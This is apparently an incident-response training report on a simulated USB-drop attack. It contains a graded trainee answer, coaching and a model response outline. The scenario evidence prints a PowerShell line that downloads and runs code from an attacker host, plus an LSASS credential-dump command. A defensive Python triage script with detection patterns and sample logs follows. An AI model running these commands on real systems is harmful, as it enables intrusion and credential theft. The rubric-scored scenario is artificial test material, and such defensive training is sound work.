incident-response-trainer
Incident response training · Rule-based scoring
Attempt report

Receptionist plugged in USB labeled 'Q2 Bonus' — EDR flagged PowerShell launch

Cybersecurity · Suspicious USB Device · Difficulty · Easy

Attempt 1 of 1 · cmqbuhsen00000j1h5n3d84ls

Progress vs previous attempt

This is your first attempt for this scenario. Retry the scenario to generate a side-by-side comparison against your previous response.

Progression · Keep practicing

Stay on Easy · Cybersecurity

4 signals are blocking advancement to Medium. Keep practicing at Easy until those areas stabilize. (Track: Cybersecurity)

Track · Cybersecurity
Easy
Sample · 5 recent attempts · 2 positive · 4 blocking

Signals helping

  • Dangerous action frequency. None in recent attempts
  • Recent retry improvement trend. Score is improving (+11 pts on later attempts)

Signals blocking advancement

  • Recent average score. 20 / 100 (need ≥ 75)
  • Recent pass rate. 0 of 5 passed (need ≥ 66%)
  • Rubric category coverage. 23% average (need ≥ 55%)
  • Consistently weak rubric areas. Investigation, Attack understanding, Containment
Submission · what was sent and how you responded
Suspicious USB Device · Difficulty · Easy · Medium asset
[EDR] Suspicious LNK + powershell.exe -enc on RECEPT-WS-01
From
EDR Alerts <edr-alerts@acme-corp.local>
To
soc@acme-corp.com
Date
2026-04-19 16:08 UTC
Automated alert from EDR (rule USB-LNK-EXEC-02). Workstation RECEPT-WS-01 (reception desk, ground floor) executed a Windows shortcut (.lnk) from a removable USB drive at 16:03:17 UTC. The shortcut launched powershell.exe with an encoded command.

Process tree: explorer.exe → powershell.exe -nop -w hidden -enc <base64>

The reception staff member tells us she found a USB stick in the lobby labeled "Q2 Bonus — do not open" earlier today and plugged it in to "see who it belonged to." She has not used the workstation for any other task since. Please respond.

— EDR / Endpoint Security
Evidence
EDR detection + USB enumeration (RECEPT-WS-01)
# Removable media event
Device:        USB Mass Storage  VID_0951&PID_1666 (Kingston)
Volume label:  Q2_BONUS
First seen:    2026-04-19 16:01:42 UTC on RECEPT-WS-01
Files:         Q2_Bonus_List.lnk, .hidden\stage1.ps1, README.txt

# LNK target (resolved)
target: %windir%\System32\WindowsPowerShell\v1.0\powershell.exe
args:   -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB...   (base64, decodes to IEX downloader)

# Decoded stage1 (preview)
$u = "https://cdn-doc-share[.]xyz/q2/s.ps1"
IEX (New-Object Net.WebClient).DownloadString($u)
# also attempts: rundll32 comsvcs.dll MiniDump <lsass pid> %TEMP%\l.dmp full

# Network activity from RECEPT-WS-01 (last 30 min)
16:03:18  TLS  RECEPT-WS-01 → cdn-doc-share[.]xyz:443
16:03:19  EDR blocked outbound to cdn-doc-share[.]xyz (low-rep, 8d-old domain)

# AV / VirusTotal lookup on stage1.ps1
SHA256 a14f..be07  →  41/72 (PowerShell.Downloader.*)
Affected asset
Name
RECEPT-WS-01
Type
Reception desk Windows workstation (shared, no privileged data stored locally)
Owner
Office Operations
Level
Medium
Your submitted response
96 words
Immediately isolate the affected host from the network to contain the threat while preserving volatile evidence. Capture memory and disk images, and collect relevant logs (auth, proxy, EDR) before any cleanup. Reset and rotate the compromised credentials, then review account and mailbox activity for signs of lateral movement or exfiltration. Notify the incident lead and prioritize the most business-critical assets first. After validating that the threat is removed, restore from a known-good backup, monitor for recurrence, and document a timeline for the post-incident review. Do not power off the machine before imaging, and avoid deleting logs.
Final score
28 / 100
96 words submitted
Verdict · Fail

The response is missing several critical incident response steps. Review the rubric and try again. Score: 28/100. Strongest area: Clarity & structure (68%). Weakest area: Attack understanding (0%) — expand this next time.

Category breakdown

Where points came from

coverage × weight = points
  • Attack understanding · 0/4 · 0.0 / 15
  • Asset impact · 2/3 · 6.7 / 10
  • Prioritization · 1/2 · 5.0 / 10
  • Containment · 1/5 · 4.0 / 20
  • Investigation · 1/5 · 3.0 / 15
  • Recovery · 0/3 · 0.0 / 10
  • Evidence preservation · 1/4 · 2.5 / 10
  • Clarity & structure · 1/2 · 6.8 / 10

Strengths

No category reached 70% coverage.

Missing / weak

  • Attack understanding
  • Containment
  • Investigation
  • Recovery
  • Evidence preservation

Dangerous actions detected

None detected in your response.

Learning · Coaching

Learn from this attempt

Post-submission coaching for this scenario. Score and verdict are unchanged — these notes are for your next attempt.

Why points were deducted

  • Attack understanding · 0% coverage

    Name the chain: lobby drop → .lnk-launched PowerShell -enc → IEX downloader → LSASS minidump attempt — not just `bad USB`.

  • Recovery · 0% coverage

    Reimage the host and rotate cached credentials; tighten removable-media policy at the org level so the next lobby drop fails closed.

  • Containment · 20% coverage

    Isolate the host, block cdn-doc-share[.]xyz at egress, kill the process chain, and physically secure the USB; partial containment leaves either domain or network exposure open.

Model answer outline

From: Incident Response Lead (SOC on-call)
To: IT Leadership · Affected Asset Owner · On-call SOC
Subject: [SEV-3][INC-CYB-EA84C] Receptionist plugged in USB labeled 'Q2 Bonus' — EDR flagged PowerShell launch — status update
Incident · INC-CYB-EA84C · SEV-3 / P3
Status · Investigating — containment in progress
Cybersecurity · Suspicious USB Device · Easy
RECEPT-WS-01 · Medium criticality
Detected ~ 2026-04-19 16:08 UTC
Situation & summary

An attacker dropped a USB labeled `Q2 Bonus — do not open` in the lobby; reception plugged it into RECEPT-WS-01 to find the owner. The .lnk launched `powershell.exe -nop -w hidden -enc` (decoded: `IEX (New-Object Net.WebClient).DownloadString` from cdn-doc-share[.]xyz, plus a `comsvcs.dll MiniDump` LSASS attempt). EDR blocked the outbound but the downloader stage executed locally — treat the host as compromised.

Severity & priority

Rated SEV-3 / P3. Treat as a P1 confirmed-execution incident (powershell.exe -enc actually ran), not a curiosity ticket.

Prioritization & impact
  • Treat as a P1 confirmed-execution incident (powershell.exe -enc actually ran), not a curiosity ticket.
  • Reception is a shared workstation in the public lobby — assume blast radius beyond the receptionist's own session.
  • Loop in EDR / Endpoint Security and the SOC lead before any user-facing cleanup begins.
Containment (actions taken / in progress)
  • Network-isolate RECEPT-WS-01 via EDR (or pull the cable) so any retried egress fails closed.
  • Block cdn-doc-share[.]xyz and the resolved IP at proxy / DNS / firewall before unisolating any other host.
  • Disable the local user account (cached creds may already be compromised), kill the powershell / rundll32 chain, and unplug + bag the USB.
Investigation (in progress)
  • Image the USB (Q2_BONUS volume) and decode all three files (.lnk, .hidden\stage1.ps1, README.txt) before anyone touches the drive again.
  • Pull EDR process tree, PowerShell Operational / 4104 / 4688 events, and the full base64 -enc payload for the SOC record.
  • Check whether the LSASS minidump (`comsvcs.dll MiniDump`) actually wrote `%TEMP%\l.dmp` — if so, treat domain-cached credentials as exposed.
  • Hunt across the fleet: the same USB VID/PID, the same SHA256, or any traffic to cdn-doc-share[.]xyz.
Recovery & next steps
  • Reimage RECEPT-WS-01 from a clean image — do not just `clean` the executed downloader.
  • Reset the receptionist's password and any cached domain account that was active on the host.
  • Tighten device-control policy (Intune / GPO) so removable storage is read-only or blocked at user-edge endpoints by default.
Evidence preservation
  • Bag-and-tag the USB stick (physical evidence, intact) and capture the full forensic image plus SHA256 of every artifact.
  • Snapshot RAM / volatile state on RECEPT-WS-01 before reimage; preserve EDR telemetry and PowerShell transcripts.
  • Record VirusTotal lookups (41/72 on stage1.ps1), and keep the original lobby USB photograph + label as part of the case file.
Stakeholder communication
  • Brief the receptionist factually and reassuringly — she did the right thing by reporting; the goal is not blame.
  • Notify Office Operations and the building security team (a physical adversary may have walked the lobby).
  • Send a short org-wide note re-iterating the `do not plug in unknown USB` policy without naming the user.
Do NOT
  • Do not plug the USB into another machine to `see what it does`.
  • Do not format / wipe the USB before imaging — you destroy evidence.
  • Do not delete the dropped binary or the .ps1 from the workstation before hashing and capturing it.
  • Do not just reimage and move on without checking whether the LSASS minidump succeeded.

How to improve next time

  • EDR blocking the network call does not mean the host is clean — assume the local process executed and search for what it did before the block fired.
  • Always image the USB before plugging it in elsewhere; no `let me just try it on a sandbox laptop` shortcuts.
  • Decode the base64 -enc payload — never reason from `it was hidden so probably bad`; show the receiver the actual IEX downloader and the LSASS minidump call.
  • If the chain attempted LSASS dumping, treat any cached domain credentials on the host as exposed and rotate accordingly.
  • Tie the fix back to device-control policy: a single user-edge GPO / Intune change can convert this from a recurring lobby attack into a non-event.
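The Investigation bullets in the model answer outline (decode the full -enc payload, look for the LSASS minidump, hunt the fleet for the same USB VID/PID, hash or domain) and the coaching tips above describe work that is easier to see as code. What follows is an added example, not part of the attempt report, the trainer, or any vendor tooling: a small Python triage script that decodes a PowerShell -enc argument (base64 over UTF-16LE text), names the behaviours the rubric's attack-understanding category expects the responder to call out, and sweeps EDR-style log lines for the report's indicators. The log line format, the hosts HR-WS-07 and FIN-WS-03 and the sample encoded command are assumptions constructed for the example; because the report shows the stage1 SHA256 only as a truncated prefix, the sweep matches on the USB VID/PID and the egress domain instead.

```python
"""Triage helpers for the RECEPT-WS-01 USB / LNK scenario.

Added example (not part of the attempt report): decodes PowerShell -enc
arguments, tags the behaviours the outline asks the responder to name,
and sweeps constructed EDR-style log lines for the report's IoCs.
"""
import base64
import binascii
import re

# Indicators taken from the evidence block of the attempt report.
IOC_DOMAIN = "cdn-doc-share[.]xyz"        # defanged, exactly as the report prints it
IOC_USB_VID_PID = "VID_0951&PID_1666"     # Kingston mass-storage device seen on RECEPT-WS-01

# -EncodedCommand and the abbreviations PowerShell accepts, followed by a base64 blob.
ENC_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)


def refang(indicator: str) -> str:
    """Turn a defanged indicator (cdn-doc-share[.]xyz) into a matchable string."""
    return indicator.replace("[.]", ".").lower()


def decode_enc_argument(arg: str) -> str:
    """Decode a PowerShell -enc value: base64 over UTF-16LE text.

    Restores missing '=' padding so a truncated prefix, like the one quoted
    in the EDR alert, still decodes as far as it goes. Returns "" on junk.
    """
    padded = arg + "=" * (-len(arg) % 4)
    try:
        return base64.b64decode(padded).decode("utf-16-le", errors="replace")
    except (binascii.Error, ValueError):
        return ""


def encode_enc_argument(script: str) -> str:
    """Inverse of decode_enc_argument; used here only to build sample log data."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def classify(script: str) -> list:
    """Tag the behaviours in a decoded script that the rubric's
    'attack understanding' category expects to see named explicitly."""
    s = script.lower()
    tags = []
    if re.search(r"\biex\b", s) or "invoke-expression" in s:
        tags.append("invoke-expression")
    if "downloadstring" in s or "downloadfile" in s or "invoke-webrequest" in s:
        tags.append("remote-download")
    if "minidump" in s or "comsvcs" in s:
        tags.append("lsass-dump")
    return tags


def hunt(lines) -> dict:
    """Sweep '<timestamp> <host> <event ...>' lines and return {host: [reasons]}
    for every host that touched an IoC or ran a suspicious -enc payload."""
    domain = refang(IOC_DOMAIN)
    hits = {}
    for line in lines:
        parts = line.split(" ", 2)
        if len(parts) < 3:
            continue                      # not in the assumed shape; skip it
        _ts, host, rest = parts
        reasons = []
        if IOC_USB_VID_PID.lower() in rest.lower():
            reasons.append("usb:" + IOC_USB_VID_PID)
        if domain in rest.lower():
            reasons.append("net:" + IOC_DOMAIN)
        m = ENC_ARG.search(rest)
        if m:
            reasons.extend("enc:" + t for t in classify(decode_enc_argument(m.group(1))))
        if reasons:
            hits.setdefault(host, []).extend(reasons)
    return hits


# Constructed sample telemetry (not real logs). The encoded command is built
# from the stage1 one-liner the report shows decoded; HR-WS-07 and FIN-WS-03
# are hypothetical hosts added to show what a fleet sweep does and does not flag.
SAMPLE_ENC = encode_enc_argument("IEX (New-Object Net.WebClient).DownloadString($u)")
SAMPLE_LOGS = [
    "2026-04-19T16:01:42Z RECEPT-WS-01 usb_insert device=USB\\VID_0951&PID_1666 label=Q2_BONUS",
    "2026-04-19T16:03:17Z RECEPT-WS-01 proc_start parent=explorer.exe image=powershell.exe "
    'cmdline="powershell.exe -nop -w hidden -enc ' + SAMPLE_ENC + '"',
    "2026-04-19T16:03:18Z RECEPT-WS-01 net_conn dst=cdn-doc-share.xyz:443 action=blocked",
    "2026-04-19T16:20:05Z HR-WS-07 usb_insert device=USB\\VID_0951&PID_1666 label=Q2_BONUS",
    '2026-04-19T16:25:11Z FIN-WS-03 proc_start parent=explorer.exe image=powershell.exe cmdline="powershell.exe -nop -c Get-Date"',
]

if __name__ == "__main__":
    # The report quotes only the first 19 base64 characters of the real payload.
    print(decode_enc_argument("SQBFAFgAIAAoAE4AZQB"))   # IEX (Ne
    for host, why in hunt(SAMPLE_LOGS).items():
        print(host, why)
```

Run stand-alone, the script decodes the prefix quoted in the alert to `IEX (Ne`, which is as far as the report's evidence goes, and the sweep flags RECEPT-WS-01 on three independent signals (the USB device, the decoded downloader, the blocked egress) while also surfacing the hypothetical HR-WS-07, where the same VID/PID appeared but no execution was logged. That second kind of hit is the point of the fleet hunt in the outline: a device match with no process event still deserves a look, because the EDR block fired after the local stage had already run.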

AI Tutor

This tutor explains your result. It does not change your score. Pick a question to see how the deterministic grading reached your verdict and where to focus next.

Generated deterministically from your graded result — no AI model was called.

Why did I get this score?

Your verdict was Fail at 28/100. That total is the sum of deterministic rubric points across 8 categories — each scores how much of its expected, ordered steps your answer covered, not an opinion about your writing. Your strongest coverage was Clarity & structure (68%). Points were held back mostly in Attack understanding (0%), Recovery (0%), Containment (20%).

Rubric focus · Attack understanding · Recovery · Containment
Next study step

Re-read the attack understanding expectations for this scenario and list the concrete steps you missed.

This tutor explains your existing result. It does not change your score, verdict, or grade. Generated deterministically from your graded result — no AI model was called.

What should I improve first?

Focus on Attack understanding first — it is your weakest rubric area at 0% coverage and carries weight 15. For this scenario: Name the chain: lobby drop → .lnk-launched PowerShell -enc → IEX downloader → LSASS minidump attempt — not just `bad USB`.

Rubric focus · Attack understanding
Next study step

Rewrite your attack understanding section as a short numbered checklist before your next attempt.

How does my answer compare to the model answer outline?

Compared with the model answer outline, the most useful sections to study are the ones matching your weak areas. Re-read the outline's attack understanding, recovery, containment guidance and check which listed points you did not cover. The outline is a high-level checklist of expected points — use it to find gaps, not to copy a finished answer.

Rubric focus · Attack understanding · Recovery · Containment
Next study step

Pick one model-answer section you missed and add its key points to your next response in your own words.

Which rubric area mattered most here?

Containment mattered most here: it carries the highest rubric weight (20), so coverage there moves your score the most. You covered 20% of it this time, worth 4 points.

Rubric focus · Containment
Next study step

Prioritise the highest-weight categories first; make sure containment is fully addressed before lower-weight ones.

What should I study next?

Based on this attempt, study attack understanding, recovery, containment next. Coaching tip for this scenario: EDR blocking the network call does not mean the host is clean — assume the local process executed and search for what it did before the block fired.

Rubric focus · Attack understanding · Recovery · Containment
Next study step

EDR blocking the network call does not mean the host is clean — assume the local process executed and search for what it did before the block fired.